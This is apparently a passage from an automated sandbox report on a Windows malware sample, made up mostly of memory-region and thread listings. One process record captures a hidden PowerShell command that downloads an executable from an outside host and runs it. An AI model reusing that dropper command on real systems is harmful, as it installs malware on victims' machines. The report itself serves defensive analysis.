"c:\\windows\\system32\\iphlpapi.dll") Region: id = 621 start_va = 0x73410000 end_va = 0x73456fff entry_point = 0x73410000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 622 start_va = 0x73470000 end_va = 0x73478fff entry_point = 0x73470000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 623 start_va = 0x734e0000 end_va = 0x734effff entry_point = 0x734e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 624 start_va = 0x73a50000 end_va = 0x73a57fff entry_point = 0x73a50000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 625 start_va = 0x73a60000 end_va = 0x73a71fff entry_point = 0x73a60000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 626 start_va = 0x73a90000 end_va = 0x73a9ffff entry_point = 0x73a90000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 627 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 628 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 629 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 630 start_va = 0x74730000 end_va = 0x74745fff entry_point = 0x74730000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 631 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 632 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 633 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 634 start_va = 0x749c0000 end_va = 0x749e1fff entry_point = 0x749c0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 635 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 636 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 637 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 638 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 639 start_va = 0x74d80000 end_va = 0x74d90fff entry_point = 0x74d80000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 640 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 641 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 642 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 643 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 644 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 645 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 646 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 647 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 648 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 649 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 650 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 651 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 652 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 653 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 654 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 655 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 656 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 657 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 658 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 659 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 660 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 661 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 662 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 663 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 664 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 665 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 666 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 667 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 668 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 669 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 670 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 671 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 673 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 674 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 675 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 676 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 677 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 678 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 679 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 680 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 681 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 682 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 683 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 695 start_va = 0x1520000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 696 start_va = 0x722f0000 end_va = 0x7231dfff entry_point = 0x722f0000 region_type = mapped_file name = "fthsvc.dll" filename = "\\Windows\\System32\\fthsvc.dll" (normalized: "c:\\windows\\system32\\fthsvc.dll") Region: id = 697 start_va = 0x74d30000 end_va = 0x74d71fff entry_point = 0x74d30000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 698 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 27 os_tid = 0x328 Thread: id = 28 os_tid = 0x6d4 Thread: id = 29 os_tid = 0x12c Thread: id = 30 os_tid = 0x11c Thread: id = 31 os_tid = 0x7dc Thread: id = 32 os_tid = 0x7c8 Thread: id = 33 os_tid = 0x784 Thread: id = 34 os_tid = 0x780 Thread: id = 35 os_tid = 0x5ec Thread: id = 36 os_tid = 0x588 Thread: id = 37 os_tid = 0x420 Thread: id = 38 os_tid = 0x41c Thread: id = 39 os_tid = 0x414 Thread: id = 40 os_tid = 0x40c Thread: id = 41 os_tid = 0x3f8 Thread: id = 42 os_tid = 0xa78 Thread: id = 43 os_tid = 0xa7c Thread: id = 44 os_tid = 0xa80 Thread: id = 49 os_tid = 0xb08 Process: id = "5" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x7f1e6680" os_pid = "0xb44" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 794 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 795 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 796 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 797 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 798 start_va = 0x22020000 end_va = 0x22091fff entry_point = 0x22020000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 799 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 800 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 801 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 802 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 803 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 808 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 809 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 810 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 811 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 812 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 813 start_va = 0x6e980000 end_va = 0x6e9c9fff entry_point = 0x6e980000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 814 start_va = 0x73490000 end_va = 0x734a3fff entry_point = 0x73490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 815 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 816 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 817 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 818 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 819 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 820 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 821 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 822 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 823 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 824 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 825 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 826 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 827 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 828 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 829 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 830 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 831 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 832 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 833 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 834 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 835 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 836 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 837 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 838 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 839 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 840 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 841 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 842 start_va = 0x1310000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 843 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 844 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 845 start_va = 0x4d0000 end_va = 0x5aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 846 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 847 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 848 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 849 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 850 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 851 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 852 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 853 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 854 start_va = 0x11e0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 855 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 856 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 857 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 858 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 859 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 860 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 861 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 862 start_va = 0x1220000 end_va = 0x1244fff entry_point = 0x1220000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 863 start_va = 0x1650000 end_va = 0x1a42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 864 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 865 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 866 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 867 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 868 start_va = 0x6ee80000 end_va = 0x6eeadfff entry_point = 0x6ee80000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 869 start_va = 0x1250000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 870 start_va = 0x1a50000 end_va = 0x1b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 871 start_va = 0x1be0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = 